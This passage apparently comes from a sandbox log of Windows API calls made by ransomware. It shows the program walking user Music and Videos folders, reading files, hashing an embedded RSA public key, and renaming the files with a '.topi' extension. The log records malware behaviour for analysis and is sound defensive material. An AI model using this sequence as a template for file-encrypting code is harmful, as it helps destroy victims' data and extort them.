hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4f88 | out: hHeap=0x680000) returned 1 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314df08 | out: hHeap=0x680000) returned 1 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9d48 | out: hHeap=0x680000) returned 1 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.763] GetCurrentThreadId () returned 0x8c4 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa190 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df1a0 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.763] GetCurrentThreadId () returned 0x8c4 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03438 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03438 | out: hHeap=0x680000) returned 1 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dee58 [0097.763] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e958 | out: hHeap=0x680000) returned 1 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.763] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f88 [0097.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e968 [0097.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9d8 | out: hHeap=0x680000) returned 1 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fa0 [0097.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.764] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.764] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.765] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\zIACoRilvHH.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\ziacorilvhh.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\44M5AK\\2s0-\\kddg-2aSE\\zIACoRilvHH.mp3.topi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\44m5ak\\2s0-\\kddg-2ase\\ziacorilvhh.mp3.topi")) returned 1 [0097.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31cf750 | out: hHeap=0x680000) returned 1 [0097.765] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.765] VirtualFree (lpAddress=0x3750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e6040 | out: hHeap=0x680000) returned 1 [0097.766] FindNextFileW (in: hFindFile=0x31c7500, lpFindFileData=0x9ccfba4 | out: lpFindFileData=0x9ccfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x143fd680, ftCreationTime.dwHighDateTime=0x1d5c347, ftLastAccessTime.dwLowDateTime=0x3d8c3f20, ftLastAccessTime.dwHighDateTime=0x1d5c54e, ftLastWriteTime.dwLowDateTime=0x3d8c3f20, ftLastWriteTime.dwHighDateTime=0x1d5c54e, nFileSizeHigh=0x0, nFileSizeLow=0x79a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zIACoRilvHH.mp3", cAlternateFileName="ZIACOR~1.MP3")) returned 0 [0097.766] FindClose (in: hFindFile=0x31c7500 | out: hFindFile=0x31c7500) returned 1 [0097.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3f40 | out: hHeap=0x680000) returned 1 [0097.766] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x6df448 | out: hHeap=0x680000) returned 1 [0097.767] PeekMessageW (in: lpMsg=0x9ccff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccff08) returned 0 [0097.767] PeekMessageW (in: lpMsg=0x9ccfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x9ccfb74) returned 0 [0097.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\LJBw4XnUu9Yf6R\\") returned="LJBw4XnUu9Yf6R\\" [0097.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\") returned="IgvWVBNSz\\" [0097.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\") returned="Yo5RRMrTBRvZPTzk\\" [0097.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0097.767] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0097.767] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0097.767] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.767] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0097.767] PathFindFileNameW (pszPath="") returned="" [0097.767] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\LJBw4XnUu9Yf6R\\vy2c4P2Qphqxkhm5M.mkv") returned=".mkv" [0097.767] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\LJBw4XnUu9Yf6R\\vy2c4P2Qphqxkhm5M.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\yo5rrmrtbrvzptzk\\igvwvbnsz\\ljbw4xnuu9yf6r\\vy2c4p2qphqxkhm5m.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6a8 [0097.767] GetFileSizeEx (in: hFile=0x6a8, lpFileSize=0x9ccfb40 | out: lpFileSize=0x9ccfb40*=14184) returned 1 [0097.768] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3750000 [0097.770] SetFilePointerEx (in: hFile=0x6a8, liDistanceToMove=0x3742, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0097.770] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9ccfb78, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb78*=0x26, lpOverlapped=0x0) returned 1 [0097.771] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.771] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.771] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0097.771] ReadFile (in: hFile=0x6a8, lpBuffer=0x3750000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9ccfb70, lpOverlapped=0x0 | out: lpBuffer=0x3750000*, lpNumberOfBytesRead=0x9ccfb70*=0x3768, lpOverlapped=0x0) returned 1 [0097.772] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.772] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f1) returned 0x31d5100 [0097.772] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.772] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAxnvHZzybKGUxH+Cc7ttW\\\\nHyoUm91TmryPiZ9LNnaMWhnZS7t38EODQuii2GcK55Ao4ABm2yEHPJ14ahmXpL+n\\\\n\\/k8p8BIMBjXGBDQcLASJ22fAabOruiNa83d0jz71y4\\/zLglfnHHFdyjFfNDlFvgG\\\\nipjfuYMJ2awwHYNxu0eGTRwFoeFN0gYV8wJauSL2tH\\/CRGeRp0GzRCXBasIKVhIe\\\\n6PmZEE3u03hDY6XBRU8yz4AFxBhgSJDJrrSoUyYfhrrxBXfeEicdl5iq8yJIRGs+\\\\nZiX0IBUK3KZQidFLch4zt8Xm8hGfH5Rks+xUVIAQP7+M3VHWYK9GmZZ5tjyWxwoO\\\\nIQIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0097.772] CryptAcquireContextW (in: phProv=0x9ccfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9ccfa50*=0x6df448) returned 1 [0097.773] CryptCreateHash (in: hProv=0x6df448, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9ccfa58 | out: phHash=0x9ccfa58) returned 1 [0097.773] CryptHashData (hHash=0x31c7580, pbData=0x31d5100, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0097.773] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x0, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9ccfa54) returned 1 [0097.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x11) returned 0x314d0e8 [0097.773] CryptGetHashParam (in: hHash=0x31c7580, dwParam=0x2, pbData=0x314d0e8, pdwDataLen=0x9ccfa54, dwFlags=0x0 | out: pbData=0x314d0e8, pdwDataLen=0x9ccfa54) returned 1 [0097.773] GetLastError () returned 0x0 [0097.773] CryptDestroyHash (hHash=0x31c7580) returned 1 [0097.773] CryptReleaseContext (hProv=0x6df448, dwFlags=0x0) returned 1 [0097.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d5100 | out: hHeap=0x680000) returned 1 [0097.773] UuidCreate (in: Uuid=0x9ccfa48 | out: Uuid=0x9ccfa48) returned 0x0 [0097.773] UuidToStringA (in: Uuid=0x9ccfa48, StringUuid=0x9ccfa40 | out: StringUuid=0x9ccfa40) returned 0x0 [0097.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.773] RpcStringFreeA (in: String=0x9ccfa40 | out: String=0x9ccfa40) returned 0x0 [0097.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fe8 | out: hHeap=0x680000) returned 1 [0097.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fe8 [0097.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x3770) returned 0x99fc2d8 [0097.773] SetFilePointer (in: hFile=0x6a8, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0097.773] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31c3fb0 | out: hHeap=0x680000) returned 1 [0097.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1970 [0097.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x30) returned 0x31c3fb0 [0097.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x1f0) returned 0x99e1b68 [0097.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9e08 [0097.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb920 [0097.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f58 [0097.773] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x40) returned 0x99fb968 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f70 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fa0 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fb8 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x24) returned 0x31d4940 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x158) returned 0x9a04a18 [0097.774] RtlReAllocateHeap (Heap=0x680000, Flags=0x0, Ptr=0x9a04a18, Size=0x218) returned 0x99e9300 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x558) returned 0x9a04420 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fa0 | out: hHeap=0x680000) returned 1 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fb8 | out: hHeap=0x680000) returned 1 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31d4940 | out: hHeap=0x680000) returned 1 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a04420 | out: hHeap=0x680000) returned 1 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e948 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4fb8 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x18) returned 0x314d0a8 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x9) returned 0x99e4fa0 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9c8 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10e) returned 0x31b6350 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x20) returned 0x31ef928 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x58) returned 0x99d9d48 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0e8 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x104) returned 0x31919a8 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314df08 [0097.774] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9a8 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31b6350 | out: hHeap=0x680000) returned 1 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fb8 | out: hHeap=0x680000) returned 1 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9c8 | out: hHeap=0x680000) returned 1 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4fa0 | out: hHeap=0x680000) returned 1 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x314d0a8 | out: hHeap=0x680000) returned 1 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.774] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a48 | out: hHeap=0x680000) returned 1 [0097.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x31ef928 | out: hHeap=0x680000) returned 1 [0097.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99d9e08 | out: hHeap=0x680000) returned 1 [0097.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e9300 | out: hHeap=0x680000) returned 1 [0097.775] GetCurrentThreadId () returned 0x8c4 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99dea38 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x82) returned 0x99fa220 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x2c) returned 0x31c3f78 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x80) returned 0x6df448 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x148) returned 0x31ce620 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9c8 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99deb40 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.775] GetCurrentThreadId () returned 0x8c4 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xeb) returned 0x9a03530 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x64) returned 0x751ab8 [0097.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x751ab8 | out: hHeap=0x680000) returned 1 [0097.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x9a03530 | out: hHeap=0x680000) returned 1 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99df068 [0097.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e948 | out: hHeap=0x680000) returned 1 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4c) returned 0x31cb988 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e948 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x100) returned 0x99def60 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a48 [0097.775] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.775] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e918 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e968 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9f8 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e958 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9b8 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9d8 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fa0 [0097.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e918 | out: hHeap=0x680000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e918 [0097.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e998 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316e9e8 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea08 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x4) returned 0x316ea18 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4fb8 [0097.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea08 | out: hHeap=0x680000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x14) returned 0x314d0a8 [0097.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9e8 | out: hHeap=0x680000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4f88 [0097.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316ea18 | out: hHeap=0x680000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a30 [0097.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e998 | out: hHeap=0x680000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e4a18 [0097.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e968 | out: hHeap=0x680000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0xc) returned 0x99e49d0 [0097.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x316e9b8 | out: hHeap=0x680000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e4fd0 [0097.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e49d0 | out: hHeap=0x680000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x10) returned 0x99e49d0 [0097.776] HeapFree (in: hHeap=0x680000, dwFlags=0x0, lpMem=0x99e4a18 | out: hHeap=0x680000) returned 1 [0097.776] RtlAllocateHeap (HeapHandle=0x680000, Flags=0x0, Size=0x8) returned 0x316e9b8 [0097.777] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\Yo5RRMrTBRvZPTzk\\IgvWVBNSz\\LJBw4XnUu9Yf6R\\vy2c4P2Qphqxkhm5M.mkv" (normalized: "c:\\users\\5p5nrgjn0js 